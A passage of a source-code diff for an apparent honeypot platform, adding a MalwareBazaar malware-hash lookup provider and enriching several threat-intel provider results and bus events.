    ``IntelProvider`` stay honest about what it accepts.

    Current implementation:

    * :class:`decnet.intel.mal_hash.MalwareBazaarProvider` — a bulk-feed
      provider shaped like :class:`decnet.intel.feodo.FeodoProvider`.

    Further implementations (a paid VirusTotal subscription, an in-house
    allowlist) are meant to plug in behind the same factory,
    :func:`decnet.intel.factory.get_mal_hash_provider`.
    """

    # Provider identifier; declared here, assigned by concrete subclasses.
    name: str

    @abstractmethod
    async def is_known_bad(self, sha256: str) -> bool:
        """Report whether *sha256* appears on this provider's bad-hash list.

        Implementations MUST NOT raise: on any error they return ``False``.
        The caller is the ingester, not a worker, so an exception escaping
        from here would taint a totally unrelated bus payload. Logging the
        failure is the provider's own responsibility.
        """
|
||||||
|
|||||||
@@ -21,7 +21,7 @@ from __future__ import annotations
|
|||||||
import os
|
import os
|
||||||
from typing import List
|
from typing import List
|
||||||
|
|
||||||
from decnet.intel.base import IntelProvider
|
from decnet.intel.base import IntelProvider, MalHashProvider
|
||||||
|
|
||||||
_KNOWN_PROVIDERS = ("greynoise", "abuseipdb", "feodo", "threatfox")
|
_KNOWN_PROVIDERS = ("greynoise", "abuseipdb", "feodo", "threatfox")
|
||||||
|
|
||||||
@@ -37,6 +37,40 @@ def _provider_list() -> list[str]:
|
|||||||
return [p.strip().lower() for p in raw.split(",") if p.strip()]
|
return [p.strip().lower() for p in raw.split(",") if p.strip()]
|
||||||
|
|
||||||
|
|
||||||
|
_mal_hash_singleton: MalHashProvider | None = None
|
||||||
|
_mal_hash_initialized: bool = False
|
||||||
|
|
||||||
|
|
||||||
|
def get_mal_hash_provider() -> MalHashProvider | None:
    """Return the process-wide malware-hash lookup provider.

    Counterpart of :func:`get_intel_providers` for the file SHA-256
    keyspace; its consumer is the email ingester at observation time, not
    the IP-keyed intel-worker fan-out.

    The result is resolved on the first call and cached for every later
    call. ``None`` is cached when intel is disabled wholesale. Otherwise a
    :class:`MalwareBazaarProvider` is built; its :meth:`is_known_bad`
    self-disables to a no-op when ``DECNET_MALWAREBAZAAR_AUTH_KEY`` is
    unset, so the ingester never has to special-case "no provider
    configured."
    """
    global _mal_hash_singleton, _mal_hash_initialized
    if not _mal_hash_initialized:
        # The flag is raised before any work so resolution is attempted
        # exactly once per process (or per test reset).
        _mal_hash_initialized = True
        if _enabled():
            # Imported lazily, only once a provider is actually needed.
            from decnet.intel.mal_hash import MalwareBazaarProvider

            _mal_hash_singleton = MalwareBazaarProvider()
        else:
            _mal_hash_singleton = None
    return _mal_hash_singleton
|
||||||
|
|
||||||
|
|
||||||
|
def _reset_mal_hash_provider_for_testing() -> None:
    """Test hook: forget the cached provider so the next lookup re-reads env."""
    global _mal_hash_singleton, _mal_hash_initialized
    _mal_hash_singleton, _mal_hash_initialized = None, False
|
||||||
|
|
||||||
|
|
||||||
def get_intel_providers() -> List[IntelProvider]:
|
def get_intel_providers() -> List[IntelProvider]:
|
||||||
"""Return the configured threat-intel providers.
|
"""Return the configured threat-intel providers.
|
||||||
|
|
||||||
|
|||||||
@@ -13,7 +13,6 @@ of attacker IPs map to a single network round-trip per refresh window.
|
|||||||
"""
|
"""
|
||||||
from __future__ import annotations
|
from __future__ import annotations
|
||||||
|
|
||||||
import json
|
|
||||||
import time
|
import time
|
||||||
from datetime import datetime, timezone
|
from datetime import datetime, timezone
|
||||||
from typing import Any, Optional
|
from typing import Any, Optional
|
||||||
@@ -93,16 +92,22 @@ class FeodoProvider(IntelProvider):
|
|||||||
verdict=None, # absence ≠ "benign", let other providers speak
|
verdict=None, # absence ≠ "benign", let other providers speak
|
||||||
column_updates={
|
column_updates={
|
||||||
"feodo_listed": False,
|
"feodo_listed": False,
|
||||||
"feodo_raw": "{}",
|
"feodo_malware_family": None,
|
||||||
|
"feodo_raw": {},
|
||||||
"feodo_queried_at": datetime.now(timezone.utc),
|
"feodo_queried_at": datetime.now(timezone.utc),
|
||||||
},
|
},
|
||||||
)
|
)
|
||||||
|
family_obj = entry.get("malware")
|
||||||
|
family = (
|
||||||
|
family_obj if isinstance(family_obj, str) and family_obj else None
|
||||||
|
)
|
||||||
return IntelResult(
|
return IntelResult(
|
||||||
provider=self.name,
|
provider=self.name,
|
||||||
verdict="malicious",
|
verdict="malicious",
|
||||||
column_updates={
|
column_updates={
|
||||||
"feodo_listed": True,
|
"feodo_listed": True,
|
||||||
"feodo_raw": json.dumps(entry),
|
"feodo_malware_family": family,
|
||||||
|
"feodo_raw": entry,
|
||||||
"feodo_queried_at": datetime.now(timezone.utc),
|
"feodo_queried_at": datetime.now(timezone.utc),
|
||||||
},
|
},
|
||||||
)
|
)
|
||||||
|
|||||||
@@ -25,7 +25,6 @@ Status code semantics:
|
|||||||
"""
|
"""
|
||||||
from __future__ import annotations
|
from __future__ import annotations
|
||||||
|
|
||||||
import json
|
|
||||||
import os
|
import os
|
||||||
from datetime import datetime, timezone
|
from datetime import datetime, timezone
|
||||||
from typing import Optional
|
from typing import Optional
|
||||||
@@ -71,7 +70,9 @@ class GreyNoiseProvider(IntelProvider):
|
|||||||
verdict="unknown",
|
verdict="unknown",
|
||||||
column_updates={
|
column_updates={
|
||||||
"greynoise_classification": "unknown",
|
"greynoise_classification": "unknown",
|
||||||
"greynoise_raw": json.dumps({"message": "not seen"}),
|
"greynoise_name": None,
|
||||||
|
"greynoise_tags": [],
|
||||||
|
"greynoise_raw": {"message": "not seen"},
|
||||||
"greynoise_queried_at": datetime.now(timezone.utc),
|
"greynoise_queried_at": datetime.now(timezone.utc),
|
||||||
},
|
},
|
||||||
)
|
)
|
||||||
@@ -88,12 +89,25 @@ class GreyNoiseProvider(IntelProvider):
|
|||||||
|
|
||||||
classification = (data.get("classification") or "unknown").lower()
|
classification = (data.get("classification") or "unknown").lower()
|
||||||
verdict = _CLASSIFICATION_TO_VERDICT.get(classification, "unknown")
|
verdict = _CLASSIFICATION_TO_VERDICT.get(classification, "unknown")
|
||||||
|
# The Community endpoint surfaces an actor ``name`` (e.g. "Tor",
|
||||||
|
# "Censys") but no behavioral tag list — the tag taxonomy is
|
||||||
|
# paid-tier only. Persist whatever we got; a future non-Community
|
||||||
|
# provider may populate ``greynoise_tags``.
|
||||||
|
name_obj = data.get("name")
|
||||||
|
name = name_obj if isinstance(name_obj, str) and name_obj else None
|
||||||
|
tags_obj = data.get("tags")
|
||||||
|
tags: list[str] = (
|
||||||
|
[t for t in tags_obj if isinstance(t, str)]
|
||||||
|
if isinstance(tags_obj, list) else []
|
||||||
|
)
|
||||||
return IntelResult(
|
return IntelResult(
|
||||||
provider=self.name,
|
provider=self.name,
|
||||||
verdict=verdict,
|
verdict=verdict,
|
||||||
column_updates={
|
column_updates={
|
||||||
"greynoise_classification": classification,
|
"greynoise_classification": classification,
|
||||||
"greynoise_raw": json.dumps(data),
|
"greynoise_name": name,
|
||||||
|
"greynoise_tags": tags,
|
||||||
|
"greynoise_raw": data,
|
||||||
"greynoise_queried_at": datetime.now(timezone.utc),
|
"greynoise_queried_at": datetime.now(timezone.utc),
|
||||||
},
|
},
|
||||||
)
|
)
|
||||||
|
|||||||
195
decnet/intel/mal_hash.py
Normal file
195
decnet/intel/mal_hash.py
Normal file
@@ -0,0 +1,195 @@
|
|||||||
|
"""MalwareBazaar bad-hash provider — bulk SHA-256 feed.
|
||||||
|
|
||||||
|
Mirrors :mod:`decnet.intel.feodo` for the refresh / TTL / set-membership
|
||||||
|
shape, but operates on the SHA-256 keyspace instead of IPs and so
|
||||||
|
implements :class:`decnet.intel.base.MalHashProvider` rather than
|
||||||
|
:class:`IntelProvider`. Keep the two ABCs disjoint — see ``base.py``.
|
||||||
|
|
||||||
|
Endpoint: ``GET https://bazaar.abuse.ch/export/csv/full/`` with
|
||||||
|
``Auth-Key: <key>`` header. Returns a ZIP'd CSV with one row per
|
||||||
|
sample; the ``sha256_hash`` column is the natural key. ~900K rows ≈
|
||||||
|
30 MB resident as a ``set[str]`` of hex-lowercased hashes.
|
||||||
|
|
||||||
|
Auth-key is read from ``DECNET_MALWAREBAZAAR_AUTH_KEY``. When unset,
|
||||||
|
the provider logs one warning at first refresh attempt and disables
|
||||||
|
itself for the process lifetime — :meth:`is_known_bad` returns ``False``
|
||||||
|
without ever making a network call. The ingester treats that the same
|
||||||
|
as "no opinion," so R0046's ``mal_hash_match`` lane stays absent on the
|
||||||
|
bus payload (which is exactly what the predicate's ``is True`` check
|
||||||
|
does today, so the silent-no-op is behaviorally identical to "lane not
|
||||||
|
shipped yet").
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
import csv
|
||||||
|
import io
|
||||||
|
import os
|
||||||
|
import time
|
||||||
|
import zipfile
|
||||||
|
from typing import Optional
|
||||||
|
|
||||||
|
from decnet.intel.base import MalHashProvider
|
||||||
|
from decnet.logging import get_logger
|
||||||
|
from decnet.net.http import stealth_client
|
||||||
|
|
||||||
|
log = get_logger("intel.mal_hash")
|
||||||
|
|
||||||
|
_ENDPOINT = "https://bazaar.abuse.ch/export/csv/full/"
|
||||||
|
_DEFAULT_REFRESH_S = 86_400.0 # 24h — feed is daily, no need to hammer
|
||||||
|
_AUTH_KEY_ENV = "DECNET_MALWAREBAZAAR_AUTH_KEY"
|
||||||
|
_REFRESH_INTERVAL_ENV = "DECNET_MAL_HASH_REFRESH_INTERVAL_S"
|
||||||
|
|
||||||
|
|
||||||
|
def _read_refresh_interval() -> float:
    """Return the bulk-feed refresh interval, in seconds, from the environment.

    Reads the variable named by ``_REFRESH_INTERVAL_ENV``
    (``DECNET_MAL_HASH_REFRESH_INTERVAL_S``). When it is unset the default
    ``_DEFAULT_REFRESH_S`` is returned. A value that does not parse as a
    float, or that parses to something unusable as an interval (zero,
    negative, ``nan`` or ``inf``), is reported with a warning and replaced
    by the default.

    Returns:
        A positive, finite number of seconds.
    """
    raw = os.environ.get(_REFRESH_INTERVAL_ENV)
    if raw is None:
        return _DEFAULT_REFRESH_S
    try:
        value = float(raw)
    except ValueError:
        log.warning(
            "%s=%r not a float; falling back to default %.0f",
            _REFRESH_INTERVAL_ENV, raw, _DEFAULT_REFRESH_S,
        )
        return _DEFAULT_REFRESH_S
    # float() happily accepts "nan", "inf", "0" and "-5". A non-positive
    # interval would re-download the whole feed on every lookup, and
    # nan/inf would never refresh it again; neither is a sane setting.
    # (nan fails both comparisons, so it is rejected here as well.)
    if not 0.0 < value < float("inf"):
        log.warning(
            "%s=%r must be a positive, finite number of seconds; "
            "falling back to default %.0f",
            _REFRESH_INTERVAL_ENV, raw, _DEFAULT_REFRESH_S,
        )
        return _DEFAULT_REFRESH_S
    return value
|
||||||
|
|
||||||
|
|
||||||
|
class MalwareBazaarProvider(MalHashProvider):
    """Bulk SHA-256 lookup against MalwareBazaar's full export.

    The provider keeps the whole feed in memory as a set of lowercase hex
    digests and answers :meth:`is_known_bad` by set membership. The feed
    is (re)fetched lazily from inside a lookup when the set is empty or
    older than the refresh interval.

    Without an auth key the provider is *disabled*: it never touches the
    network, logs a single warning on the first lookup, and answers
    ``False`` to everything.
    """

    name = "malwarebazaar"

    # Longest time, in seconds, that a failed refresh suppresses the next
    # attempt. Without it, every lookup made while the feed is unreachable
    # would wait on a fresh download attempt.
    _FAILURE_BACKOFF_S = 60.0

    def __init__(
        self,
        *,
        auth_key: Optional[str] = None,
        refresh_interval_s: Optional[float] = None,
    ) -> None:
        """Configure the provider; no network I/O happens here.

        Args:
            auth_key: MalwareBazaar ``Auth-Key``. Falls back to the
                environment variable named by ``_AUTH_KEY_ENV``; an empty
                value counts as unset.
            refresh_interval_s: Seconds between feed refreshes. Falls back
                to :func:`_read_refresh_interval` when ``None``.
        """
        self._auth_key = auth_key or os.environ.get(_AUTH_KEY_ENV) or None
        self._refresh_interval_s = (
            refresh_interval_s
            if refresh_interval_s is not None
            else _read_refresh_interval()
        )
        self._known: set[str] = set()
        self._loaded_at: float = 0.0
        self._last_error: Optional[str] = None
        self._disabled_warned: bool = False
        # time.monotonic() value before which a failed refresh is not retried.
        self._retry_not_before: float = 0.0

    @property
    def disabled(self) -> bool:
        """``True`` when no auth key is configured."""
        return self._auth_key is None

    async def _refresh(self) -> Optional[str]:
        """Refetch the bulk feed. Returns an error string or ``None``.

        The in-memory set is only replaced after a successful, non-empty
        parse, so a failed refresh leaves the previous data in place.
        """
        if self._auth_key is None:
            return "no auth key"
        try:
            async with stealth_client(timeout=60.0) as client:
                resp = await client.get(
                    _ENDPOINT, headers={"Auth-Key": self._auth_key},
                )
        except Exception as exc:  # noqa: BLE001
            return f"network: {exc}"
        if resp.status_code != 200:
            return f"HTTP {resp.status_code}"
        body = resp.content
        try:
            new_known = _parse_dump(body)
        except Exception as exc:  # noqa: BLE001
            return f"parse: {exc}"
        if not new_known:
            return "feed: empty"
        self._known = new_known
        self._loaded_at = time.monotonic()
        self._last_error = None
        log.info("malwarebazaar: refreshed bulk feed entries=%d", len(new_known))
        return None

    async def _ensure_fresh(self) -> None:
        """Refresh the feed when it is missing or stale.

        Refresh failures are recorded in ``_last_error`` and logged, never
        raised. After a failure, further attempts are skipped for a short
        back-off window (capped by the refresh interval) so a feed outage
        does not turn every lookup into a download attempt.
        """
        if self.disabled:
            if not self._disabled_warned:
                log.warning(
                    "R0046 mal_hash_match disabled: %s unset",
                    _AUTH_KEY_ENV,
                )
                self._disabled_warned = True
            return
        now = time.monotonic()
        stale = (
            not self._known
            or (now - self._loaded_at) >= self._refresh_interval_s
        )
        if not stale or now < self._retry_not_before:
            return
        err = await self._refresh()
        if err:
            self._last_error = err
            backoff = min(
                self._FAILURE_BACKOFF_S, max(self._refresh_interval_s, 0.0),
            )
            self._retry_not_before = time.monotonic() + backoff
            log.warning("malwarebazaar refresh failed: %s", err)

    async def is_known_bad(self, sha256: str) -> bool:
        """Return whether *sha256* is in the loaded MalwareBazaar feed.

        Never raises: a disabled provider, a failed refresh, or a
        non-string argument all yield ``False``. The comparison is
        case-insensitive.
        """
        try:
            # Called even when disabled so the one-time "auth key unset"
            # warning is actually emitted on the first lookup.
            await self._ensure_fresh()
        except Exception as exc:  # noqa: BLE001
            # Belt and braces: _ensure_fresh swallows refresh failures
            # but a bug in there shouldn't blow up the ingester payload.
            log.exception("malwarebazaar refresh raised: %s", exc)
            return False
        if self.disabled or not isinstance(sha256, str):
            return False
        return sha256.lower() in self._known
|
||||||
|
|
||||||
|
|
||||||
|
def _parse_dump(body: bytes) -> set[str]:
    """Turn a MalwareBazaar dump payload into a set of SHA-256 hashes.

    The payload is normally a ZIP archive holding one CSV, but some
    abuse.ch feeds of the same family ship the CSV uncompressed, so the
    format is sniffed from the ``PK`` magic bytes. For an archive, the
    first member whose name ends in ``.csv`` is used. The CSV bytes are
    decoded as UTF-8 (undecodable bytes are replaced) and handed to
    :func:`_extract_hashes`, which lowercases the hashes and drops
    malformed values.

    Raises:
        ValueError: the payload is a ZIP archive with no ``.csv`` member.
    """
    payload = body
    if body.startswith(b"PK"):
        with zipfile.ZipFile(io.BytesIO(body)) as archive:
            member = next(
                (m for m in archive.namelist() if m.lower().endswith(".csv")),
                None,
            )
            if member is None:
                raise ValueError("zip has no .csv member")
            payload = archive.read(member)
    return _extract_hashes(payload.decode("utf-8", errors="replace"))
|
||||||
|
|
||||||
|
|
||||||
|
def _extract_hashes(text: str) -> set[str]:
    """Pull the SHA-256 hashes out of MalwareBazaar's CSV dump.

    The dump opens with ``#``-prefixed banner lines, and the column header
    may itself sit on a ``#``-prefixed line, so comment lines are checked
    for a ``sha256_hash`` header before being discarded. The hash column
    is located as follows:

    1. a header (commented or not) containing ``sha256_hash`` fixes the
       column index;
    2. with no such header, every row is treated as data and the first
       cell that looks like a SHA-256 digest is taken. Nothing is assumed
       about column order and no data row is consumed as a header.

    Cells are stripped of surrounding whitespace and quotes and
    lowercased; anything that is not exactly 64 hex characters is dropped
    (defense in depth, since lookups are exact set-membership tests).

    Args:
        text: Decoded CSV content.

    Returns:
        The set of lowercase hex SHA-256 digests found; empty when the
        input has no usable rows.
    """
    hex_digits = frozenset("0123456789abcdef")

    def clean(cell: str) -> str:
        # Rows may be written as `"a", "b"`: csv.reader then leaves the
        # leading space and the quotes inside the cell.
        return cell.strip().strip('"').strip().lower()

    def sha256_or_none(cell: str):
        value = clean(cell)
        if len(value) == 64 and hex_digits.issuperset(value):
            return value
        return None

    def header_column(cells):
        names = [clean(c) for c in cells]
        return names.index("sha256_hash") if "sha256_hash" in names else None

    col = None
    data_lines = []
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped:
            continue
        if not stripped.startswith("#"):
            data_lines.append(line)
        elif col is None:
            # A commented line is either banner text or the header row.
            commented = stripped.lstrip("#").strip()
            col = header_column(next(csv.reader([commented]), []))

    out: set[str] = set()
    for row in csv.reader(data_lines):
        if col is None:
            # No header seen yet: this row is either an uncommented header
            # or plain data.
            col = header_column(row)
            if col is not None:
                continue
            found = next(
                (h for h in map(sha256_or_none, row) if h is not None), None,
            )
        elif len(row) > col:
            found = sha256_or_none(row[col])
        else:
            continue
        if found is not None:
            out.add(found)
    return out
|
||||||
@@ -12,7 +12,6 @@ caps requests/min — the provider works either way.
|
|||||||
"""
|
"""
|
||||||
from __future__ import annotations
|
from __future__ import annotations
|
||||||
|
|
||||||
import json
|
|
||||||
import os
|
import os
|
||||||
from datetime import datetime, timezone
|
from datetime import datetime, timezone
|
||||||
from typing import Optional
|
from typing import Optional
|
||||||
@@ -71,7 +70,10 @@ class ThreatFoxProvider(IntelProvider):
|
|||||||
verdict=None, # absence is not a benign signal
|
verdict=None, # absence is not a benign signal
|
||||||
column_updates={
|
column_updates={
|
||||||
"threatfox_listed": False,
|
"threatfox_listed": False,
|
||||||
"threatfox_raw": "{}",
|
"threatfox_threat_types": [],
|
||||||
|
"threatfox_ioc_types": [],
|
||||||
|
"threatfox_malware_families": [],
|
||||||
|
"threatfox_raw": {},
|
||||||
"threatfox_queried_at": datetime.now(timezone.utc),
|
"threatfox_queried_at": datetime.now(timezone.utc),
|
||||||
},
|
},
|
||||||
)
|
)
|
||||||
@@ -83,12 +85,37 @@ class ThreatFoxProvider(IntelProvider):
|
|||||||
|
|
||||||
data = payload.get("data") or []
|
data = payload.get("data") or []
|
||||||
listed = bool(data)
|
listed = bool(data)
|
||||||
|
# Each match in ``data`` carries threat_type / ioc_type / malware
|
||||||
|
# (canonical family). The IntelLifter dispatches ATT&CK techniques
|
||||||
|
# off ``threat_type`` (botnet_cc / payload_delivery / payload /
|
||||||
|
# cc_skimming); the other two columns are evidence and SIEM
|
||||||
|
# context. Sets are flattened across matches and serialised
|
||||||
|
# sorted for determinism.
|
||||||
|
threat_types: set[str] = set()
|
||||||
|
ioc_types: set[str] = set()
|
||||||
|
families: set[str] = set()
|
||||||
|
if isinstance(data, list):
|
||||||
|
for entry in data:
|
||||||
|
if not isinstance(entry, dict):
|
||||||
|
continue
|
||||||
|
tt = entry.get("threat_type")
|
||||||
|
if isinstance(tt, str) and tt:
|
||||||
|
threat_types.add(tt)
|
||||||
|
it = entry.get("ioc_type")
|
||||||
|
if isinstance(it, str) and it:
|
||||||
|
ioc_types.add(it)
|
||||||
|
family = entry.get("malware") or entry.get("malware_printable")
|
||||||
|
if isinstance(family, str) and family:
|
||||||
|
families.add(family)
|
||||||
return IntelResult(
|
return IntelResult(
|
||||||
provider=self.name,
|
provider=self.name,
|
||||||
verdict="malicious" if listed else None,
|
verdict="malicious" if listed else None,
|
||||||
column_updates={
|
column_updates={
|
||||||
"threatfox_listed": listed,
|
"threatfox_listed": listed,
|
||||||
"threatfox_raw": json.dumps(data),
|
"threatfox_threat_types": sorted(threat_types),
|
||||||
|
"threatfox_ioc_types": sorted(ioc_types),
|
||||||
|
"threatfox_malware_families": sorted(families),
|
||||||
|
"threatfox_raw": data,
|
||||||
"threatfox_queried_at": datetime.now(timezone.utc),
|
"threatfox_queried_at": datetime.now(timezone.utc),
|
||||||
},
|
},
|
||||||
)
|
)
|
||||||
|
|||||||
@@ -59,6 +59,38 @@ def _aggregate(verdicts: list[Optional[str]]) -> Optional[str]:
|
|||||||
return None
|
return None
|
||||||
|
|
||||||
|
|
||||||
|
def _build_intel_event_payload(
    attacker_uuid: str,
    ip: str,
    row: dict[str, Any],
    providers: list[IntelProvider],
) -> dict[str, Any]:
    """Build the bus event for one enriched attacker from its intel row.

    The event is what the TTP worker consumes as ``source_kind="intel"``.
    It carries the attacker identity, the aggregate verdict, the names of
    the providers, and a fixed projection of per-provider columns read
    from *row*. Scalar columns are copied as-is (``None`` when absent);
    list columns are normalised so a missing or empty value becomes ``[]``.
    """
    payload: dict[str, Any] = {
        "attacker_uuid": attacker_uuid,
        "attacker_ip": ip,
        "aggregate_verdict": row.get("aggregate_verdict"),
        "providers": [provider.name for provider in providers],
    }
    # (column name, is-list) pairs, in the order they appear in the event.
    projected_columns = (
        # AbuseIPDB
        ("abuseipdb_score", False),
        ("abuseipdb_categories", True),
        # GreyNoise
        ("greynoise_classification", False),
        ("greynoise_name", False),
        ("greynoise_tags", True),
        # Feodo
        ("feodo_listed", False),
        ("feodo_malware_family", False),
        # ThreatFox
        ("threatfox_listed", False),
        ("threatfox_threat_types", True),
        ("threatfox_ioc_types", True),
        ("threatfox_malware_families", True),
    )
    for column, is_list in projected_columns:
        value = row.get(column)
        payload[column] = (value or []) if is_list else value
    return payload
|
||||||
|
|
||||||
|
|
||||||
async def _enrich_one(
|
async def _enrich_one(
|
||||||
attacker_uuid: str,
|
attacker_uuid: str,
|
||||||
ip: str,
|
ip: str,
|
||||||
@@ -172,12 +204,9 @@ async def run_intel_loop(
|
|||||||
await publish_safely(
|
await publish_safely(
|
||||||
bus,
|
bus,
|
||||||
_topics.attacker(_topics.ATTACKER_INTEL_ENRICHED),
|
_topics.attacker(_topics.ATTACKER_INTEL_ENRICHED),
|
||||||
{
|
_build_intel_event_payload(
|
||||||
"attacker_uuid": attacker_uuid,
|
attacker_uuid, ip, row, providers,
|
||||||
"attacker_ip": ip,
|
),
|
||||||
"aggregate_verdict": row.get("aggregate_verdict"),
|
|
||||||
"providers": [p.name for p in providers],
|
|
||||||
},
|
|
||||||
event_type=_topics.ATTACKER_INTEL_ENRICHED,
|
event_type=_topics.ATTACKER_INTEL_ENRICHED,
|
||||||
)
|
)
|
||||||
except Exception: # noqa: BLE001
|
except Exception: # noqa: BLE001
|
||||||
@@ -200,11 +229,11 @@ async def run_intel_loop(
|
|||||||
t.cancel()
|
t.cancel()
|
||||||
if heartbeat_task is not None:
|
if heartbeat_task is not None:
|
||||||
heartbeat_task.cancel()
|
heartbeat_task.cancel()
|
||||||
for t in (*wake_tasks, heartbeat_task):
|
for task in (*wake_tasks, heartbeat_task):
|
||||||
if t is None:
|
if task is None:
|
||||||
continue
|
continue
|
||||||
with contextlib.suppress(asyncio.CancelledError, Exception):
|
with contextlib.suppress(asyncio.CancelledError, Exception):
|
||||||
await t
|
await task
|
||||||
if bus is not None:
|
if bus is not None:
|
||||||
with contextlib.suppress(Exception):
|
with contextlib.suppress(Exception):
|
||||||
await bus.close()
|
await bus.close()
|
||||||
|
|||||||
@@ -28,7 +28,7 @@ class _ComponentFilter(logging.Filter):
|
|||||||
self.component = component
|
self.component = component
|
||||||
|
|
||||||
def filter(self, record: logging.LogRecord) -> bool:
|
def filter(self, record: logging.LogRecord) -> bool:
|
||||||
record.decnet_component = self.component # type: ignore[attr-defined]
|
record.decnet_component = self.component
|
||||||
return True
|
return True
|
||||||
|
|
||||||
|
|
||||||
@@ -49,14 +49,14 @@ class _TraceContextFilter(logging.Filter):
|
|||||||
span = trace.get_current_span()
|
span = trace.get_current_span()
|
||||||
ctx = span.get_span_context()
|
ctx = span.get_span_context()
|
||||||
if ctx and ctx.trace_id:
|
if ctx and ctx.trace_id:
|
||||||
record.otel_trace_id = format(ctx.trace_id, "032x") # type: ignore[attr-defined]
|
record.otel_trace_id = format(ctx.trace_id, "032x")
|
||||||
record.otel_span_id = format(ctx.span_id, "016x") # type: ignore[attr-defined]
|
record.otel_span_id = format(ctx.span_id, "016x")
|
||||||
else:
|
else:
|
||||||
record.otel_trace_id = "0" # type: ignore[attr-defined]
|
record.otel_trace_id = "0"
|
||||||
record.otel_span_id = "0" # type: ignore[attr-defined]
|
record.otel_span_id = "0"
|
||||||
except Exception:
|
except Exception:
|
||||||
record.otel_trace_id = "0" # type: ignore[attr-defined]
|
record.otel_trace_id = "0"
|
||||||
record.otel_span_id = "0" # type: ignore[attr-defined]
|
record.otel_span_id = "0"
|
||||||
return True
|
return True
|
||||||
|
|
||||||
|
|
||||||
|
|||||||
@@ -91,7 +91,7 @@ class DeckyConfig(BaseModel):
|
|||||||
services: list[str] = PydanticField(..., min_length=1)
|
services: list[str] = PydanticField(..., min_length=1)
|
||||||
distro: str # slug from distros.DISTROS, e.g. "debian", "ubuntu22"
|
distro: str # slug from distros.DISTROS, e.g. "debian", "ubuntu22"
|
||||||
base_image: str # Docker image for the base/IP-holder container
|
base_image: str # Docker image for the base/IP-holder container
|
||||||
build_base: str = "debian:bookworm-slim" # apt-compatible image for service Dockerfiles
|
build_base: str = "debian:bookworm-slim@sha256:f9c6a2fd2ddbc23e336b6257a5245e31f996953ef06cd13a59fa0a1df2d5c252" # apt-compatible image for service Dockerfiles; digest pinned via distros.py
|
||||||
hostname: str
|
hostname: str
|
||||||
archetype: str | None = None # archetype slug if spawned from an archetype profile
|
archetype: str | None = None # archetype slug if spawned from an archetype profile
|
||||||
service_config: dict[str, dict] = PydanticField(default_factory=dict)
|
service_config: dict[str, dict] = PydanticField(default_factory=dict)
|
||||||
|
|||||||
@@ -101,7 +101,10 @@ async def mutate_decky(
|
|||||||
|
|
||||||
try:
|
try:
|
||||||
# Wrap blocking call in thread
|
# Wrap blocking call in thread
|
||||||
await anyio.to_thread.run_sync(_compose_with_retry, "up", "-d", "--remove-orphans", compose_path)
|
cp = compose_path
|
||||||
|
await anyio.to_thread.run_sync(
|
||||||
|
lambda: _compose_with_retry("up", "-d", "--remove-orphans", compose_file=cp)
|
||||||
|
)
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
log.error("mutation failed decky=%s error=%s", decky_name, e)
|
log.error("mutation failed decky=%s error=%s", decky_name, e)
|
||||||
console.print(f"[red]Failed to mutate '{decky_name}': {e}[/]")
|
console.print(f"[red]Failed to mutate '{decky_name}': {e}[/]")
|
||||||
@@ -161,6 +164,8 @@ async def mutate_all(
|
|||||||
if force or only is not None:
|
if force or only is not None:
|
||||||
due = True
|
due = True
|
||||||
else:
|
else:
|
||||||
|
if interval_mins is None:
|
||||||
|
continue
|
||||||
elapsed_secs = now - decky.last_mutated
|
elapsed_secs = now - decky.last_mutated
|
||||||
due = elapsed_secs >= (interval_mins * 60)
|
due = elapsed_secs >= (interval_mins * 60)
|
||||||
remaining = (interval_mins * 60) - elapsed_secs
|
remaining = (interval_mins * 60) - elapsed_secs
|
||||||
@@ -284,13 +289,13 @@ async def reconcile_agent_resyncs(repo: BaseRepository) -> int:
|
|||||||
return 0
|
return 0
|
||||||
drained = 0
|
drained = 0
|
||||||
for topo in pending:
|
for topo in pending:
|
||||||
tid = topo["id"]
|
tid = topo.id
|
||||||
try:
|
try:
|
||||||
await _deployer.resync_agent_topology(repo, tid)
|
await _deployer.resync_agent_topology(repo, tid)
|
||||||
await repo.set_topology_resync(tid, False)
|
await repo.set_topology_resync(tid, False)
|
||||||
drained += 1
|
drained += 1
|
||||||
log.info("topology %s resynced to agent %s",
|
log.info("topology %s resynced to agent %s",
|
||||||
tid, topo.get("target_host_uuid"))
|
tid, topo.target_host_uuid)
|
||||||
except Exception as exc: # noqa: BLE001
|
except Exception as exc: # noqa: BLE001
|
||||||
log.warning(
|
log.warning(
|
||||||
"topology %s resync failed (will retry): %s", tid, exc,
|
"topology %s resync failed (will retry): %s", tid, exc,
|
||||||
@@ -405,11 +410,11 @@ async def run_watch_loop(repo: BaseRepository, poll_interval_secs: int = 10) ->
|
|||||||
t.cancel()
|
t.cancel()
|
||||||
if heartbeat_task is not None:
|
if heartbeat_task is not None:
|
||||||
heartbeat_task.cancel()
|
heartbeat_task.cancel()
|
||||||
for t in (*wake_tasks, heartbeat_task):
|
for task in (*wake_tasks, heartbeat_task):
|
||||||
if t is None:
|
if task is None:
|
||||||
continue
|
continue
|
||||||
with contextlib.suppress(asyncio.CancelledError, Exception):
|
with contextlib.suppress(asyncio.CancelledError, Exception):
|
||||||
await t
|
await task
|
||||||
if bus is not None:
|
if bus is not None:
|
||||||
with contextlib.suppress(Exception):
|
with contextlib.suppress(Exception):
|
||||||
await bus.close()
|
await bus.close()
|
||||||
|
|||||||
@@ -98,6 +98,463 @@ def _decky_by_name(hydrated: dict[str, Any], name: str) -> Optional[dict]:
|
|||||||
)
|
)
|
||||||
|
|
||||||
|
|
||||||
|
async def _materialise_lan_change(
    repo: Any,
    topology_id: str,
    *,
    created: Optional[tuple[str, str, bool]] = None,
    removed: Optional[str] = None,
) -> None:
    """Create or remove the docker bridge for a live LAN op + re-render compose.

    Called from ``apply_add_lan`` / ``apply_remove_lan`` after the DB
    write lands.  Does nothing when:

    * the topology does not exist or is not active/degraded (a pending
      topology gets its networks created at deploy time),
    * the topology is pinned to a swarm agent (cross-host materialisation
      isn't implemented; the agent's apply_topology RPC re-renders the
      whole compose at next push).

    Any failure raised by the docker SDK / networking primitives —
    including building the client itself — is logged, not re-raised: the
    DB row is the source of truth.

    Args:
        repo: Repository exposing ``get_topology``; also passed to ``hydrate``.
        topology_id: Topology whose LAN set just changed.
        created: ``(name, subnet, is_dmz)`` of a LAN that was just added.
        removed: Name of a LAN that was just deleted.
    """
    topology = await repo.get_topology(topology_id)
    if topology is None:
        return
    if topology.status not in ("active", "degraded"):
        return
    if topology.target_host_uuid:
        _log.info(
